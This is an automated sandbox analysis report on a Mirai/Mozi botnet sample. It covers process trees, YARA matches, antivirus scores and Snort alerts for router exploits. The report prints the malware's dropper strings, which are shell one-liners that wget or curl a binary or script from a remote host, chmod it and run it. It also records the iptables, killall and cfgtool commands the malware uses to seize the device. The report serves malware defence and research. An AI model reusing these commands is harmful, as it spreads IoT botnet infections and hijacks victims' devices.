Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report i

Overview

General Information

Sample Name:i
Analysis ID:336769
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • i (PID: 4547, Parent: 4498, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/i
    • i New Fork (PID: 4560, Parent: 4547)
      • i New Fork (PID: 4562, Parent: 4560)
        • i New Fork (PID: 4564, Parent: 4562)
        • sh (PID: 4564, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4566, Parent: 4564)
          • killall (PID: 4566, Parent: 4564, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • i New Fork (PID: 4583, Parent: 4562)
        • i New Fork (PID: 4584, Parent: 4562)
        • i New Fork (PID: 4585, Parent: 4562)
          • i New Fork (PID: 4605, Parent: 4585)
          • sh (PID: 4605, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT"
            • sh New Fork (PID: 4613, Parent: 4605)
            • iptables (PID: 4613, Parent: 4605, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT
              • iptables New Fork (PID: 4621, Parent: 4613)
              • modprobe (PID: 4621, Parent: 4613, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • i New Fork (PID: 4658, Parent: 4585)
          • sh (PID: 4658, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT"
            • sh New Fork (PID: 4662, Parent: 4658)
            • iptables (PID: 4662, Parent: 4658, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT
          • i New Fork (PID: 4666, Parent: 4585)
          • sh (PID: 4666, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT"
            • sh New Fork (PID: 4675, Parent: 4666)
            • iptables (PID: 4675, Parent: 4666, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT
          • i New Fork (PID: 4708, Parent: 4585)
          • sh (PID: 4708, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT"
            • sh New Fork (PID: 4710, Parent: 4708)
            • iptables (PID: 4710, Parent: 4708, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT
          • i New Fork (PID: 4711, Parent: 4585)
          • sh (PID: 4711, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 57738 -j ACCEPT"
            • sh New Fork (PID: 4714, Parent: 4711)
            • iptables (PID: 4714, Parent: 4711, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 57738 -j ACCEPT
          • i New Fork (PID: 4723, Parent: 4585)
          • sh (PID: 4723, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT"
            • sh New Fork (PID: 4732, Parent: 4723)
            • iptables (PID: 4732, Parent: 4723, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT
          • i New Fork (PID: 4752, Parent: 4585)
          • sh (PID: 4752, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT"
            • sh New Fork (PID: 4763, Parent: 4752)
            • iptables (PID: 4763, Parent: 4752, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT
          • i New Fork (PID: 4783, Parent: 4585)
          • sh (PID: 4783, Parent: 4585, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT"
            • sh New Fork (PID: 4787, Parent: 4783)
            • iptables (PID: 4787, Parent: 4783, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT
        • i New Fork (PID: 4589, Parent: 4562)
        • i New Fork (PID: 4594, Parent: 4562)
        • i New Fork (PID: 4598, Parent: 4562)
        • i New Fork (PID: 4857, Parent: 4562)
        • sh (PID: 4857, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4860, Parent: 4857)
          • iptables (PID: 4860, Parent: 4857, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • i New Fork (PID: 4869, Parent: 4562)
        • sh (PID: 4869, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4878, Parent: 4869)
          • iptables (PID: 4878, Parent: 4869, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • i New Fork (PID: 4892, Parent: 4562)
        • sh (PID: 4892, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4897, Parent: 4892)
          • iptables (PID: 4897, Parent: 4892, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • i New Fork (PID: 4899, Parent: 4562)
        • sh (PID: 4899, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4909, Parent: 4899)
          • iptables (PID: 4909, Parent: 4899, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • i New Fork (PID: 4929, Parent: 4562)
        • sh (PID: 4929, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • i New Fork (PID: 4935, Parent: 4562)
        • sh (PID: 4935, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • i New Fork (PID: 4937, Parent: 4562)
        • sh (PID: 4937, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4940, Parent: 4937)
          • iptables (PID: 4940, Parent: 4937, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • i New Fork (PID: 4949, Parent: 4562)
        • sh (PID: 4949, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4959, Parent: 4949)
          • iptables (PID: 4959, Parent: 4949, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • i New Fork (PID: 4980, Parent: 4562)
        • sh (PID: 4980, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4994, Parent: 4980)
          • iptables (PID: 4994, Parent: 4980, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • i New Fork (PID: 5009, Parent: 4562)
        • sh (PID: 5009, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 5012, Parent: 5009)
          • iptables (PID: 5012, Parent: 5009, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • i New Fork (PID: 5018, Parent: 4562)
        • sh (PID: 5018, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 5028, Parent: 5018)
          • iptables (PID: 5028, Parent: 5018, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • i New Fork (PID: 5047, Parent: 4562)
        • sh (PID: 5047, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5050, Parent: 5047)
          • iptables (PID: 5050, Parent: 5047, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • i New Fork (PID: 5052, Parent: 4562)
        • sh (PID: 5052, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5062, Parent: 5052)
          • iptables (PID: 5062, Parent: 5052, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • i New Fork (PID: 5084, Parent: 4562)
        • sh (PID: 5084, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5091, Parent: 5084)
          • iptables (PID: 5091, Parent: 5084, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • i New Fork (PID: 5097, Parent: 4562)
        • sh (PID: 5097, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5100, Parent: 5097)
          • iptables (PID: 5100, Parent: 5097, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • i New Fork (PID: 5118, Parent: 4562)
        • sh (PID: 5118, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5124, Parent: 5118)
          • iptables (PID: 5124, Parent: 5118, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • i New Fork (PID: 5130, Parent: 4562)
        • sh (PID: 5130, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5140, Parent: 5130)
          • iptables (PID: 5140, Parent: 5130, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • i New Fork (PID: 5159, Parent: 4562)
        • sh (PID: 5159, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5164, Parent: 5159)
          • iptables (PID: 5164, Parent: 5159, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • i New Fork (PID: 5181, Parent: 4562)
        • sh (PID: 5181, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT"
          • sh New Fork (PID: 5183, Parent: 5181)
          • iptables (PID: 5183, Parent: 5181, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT
        • i New Fork (PID: 5184, Parent: 4562)
        • sh (PID: 5184, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT"
          • sh New Fork (PID: 5189, Parent: 5184)
          • iptables (PID: 5189, Parent: 5184, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT
        • i New Fork (PID: 5213, Parent: 4562)
        • sh (PID: 5213, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT"
          • sh New Fork (PID: 5220, Parent: 5213)
          • iptables (PID: 5220, Parent: 5213, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT
        • i New Fork (PID: 5235, Parent: 4562)
        • sh (PID: 5235, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT"
          • sh New Fork (PID: 5240, Parent: 5235)
          • iptables (PID: 5240, Parent: 5235, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT
        • i New Fork (PID: 5241, Parent: 4562)
        • sh (PID: 5241, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 28537 -j ACCEPT"
          • sh New Fork (PID: 5243, Parent: 5241)
          • iptables (PID: 5243, Parent: 5241, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 28537 -j ACCEPT
        • i New Fork (PID: 5244, Parent: 4562)
        • sh (PID: 5244, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT"
          • sh New Fork (PID: 5249, Parent: 5244)
          • iptables (PID: 5249, Parent: 5244, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT
        • i New Fork (PID: 5268, Parent: 4562)
        • sh (PID: 5268, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT"
          • sh New Fork (PID: 5282, Parent: 5268)
          • iptables (PID: 5282, Parent: 5268, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT
        • i New Fork (PID: 5308, Parent: 4562)
        • sh (PID: 5308, Parent: 4562, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT"
          • sh New Fork (PID: 5315, Parent: 5308)
          • iptables (PID: 5315, Parent: 5308, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT
  • upstart New Fork (PID: 4597, Parent: 3310)
  • sh (PID: 4597, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4617, Parent: 4597)
    • date (PID: 4617, Parent: 4597, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4646, Parent: 4597)
    • apport-checkreports (PID: 4646, Parent: 4597, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4803, Parent: 3310)
  • sh (PID: 4803, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4812, Parent: 4803)
    • date (PID: 4812, Parent: 4803, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4813, Parent: 4803)
    • apport-gtk (PID: 4813, Parent: 4803, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4830, Parent: 3310)
  • sh (PID: 4830, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4831, Parent: 4830)
    • date (PID: 4831, Parent: 4830, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4832, Parent: 4830)
    • apport-gtk (PID: 4832, Parent: 4830, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
iSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
iJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    iJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      iJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
        /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: iAvira: detected
              Antivirus detection for dropped fileShow sources
              Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
              Multi AV Scanner detection for submitted fileShow sources
              Source: iVirustotal: Detection: 64%Perma Link
              Source: iReversingLabs: Detection: 68%

              Spreading:

              barindex
              Found strings indicative of a multi-platform dropperShow sources
              Source: iString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: iString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: iString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Opens /proc/net/* files useful for finding connected devices and routersShow sources
              Source: /tmp/i (PID: 4585)Opens: /proc/net/route
              Source: /tmp/i (PID: 4585)Opens: /proc/net/route

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 38.126.144.18: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.247.205.165: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 193.8.201.1: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.86.244.254: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.248.64.225: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.95.181: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:39168 -> 212.12.160.58:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:39168 -> 212.12.160.58:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.22.153: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.92.218.209:8003 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 185.246.176.157:44790 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 85.106.8.102:11211 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.74.98:1900 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38282 -> 203.152.217.144:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38282 -> 203.152.217.144:80
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 58.97.206.33:41682 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 220.124.130.66:8083 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 111.92.80.183:31921 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:37296 -> 195.231.168.45:52869
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 14.46.31.88:8082 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.101.88.85: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.232.198.189: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 174.58.192.2: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.34.62.97: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.233.121.196: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:43552 -> 132.64.170.45:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:43552 -> 132.64.170.45:80
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44388 -> 71.41.225.74:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.158.215.92: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33166 -> 149.129.130.58:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33166 -> 149.129.130.58:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.231.181.161: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:44076 -> 192.34.60.236:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:44076 -> 192.34.60.236:80
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:55366 -> 91.233.85.66:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:55366 -> 91.233.85.66:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:41050 -> 167.82.102.91:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:41050 -> 167.82.102.91:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 90.161.157.169: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.216.150.65: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.21:7049 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 69.92.67.36:57065 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.87.91: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 77.123.130.180: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33674 -> 139.162.182.70:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33674 -> 139.162.182.70:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.78.52.239: -> 192.168.2.20:
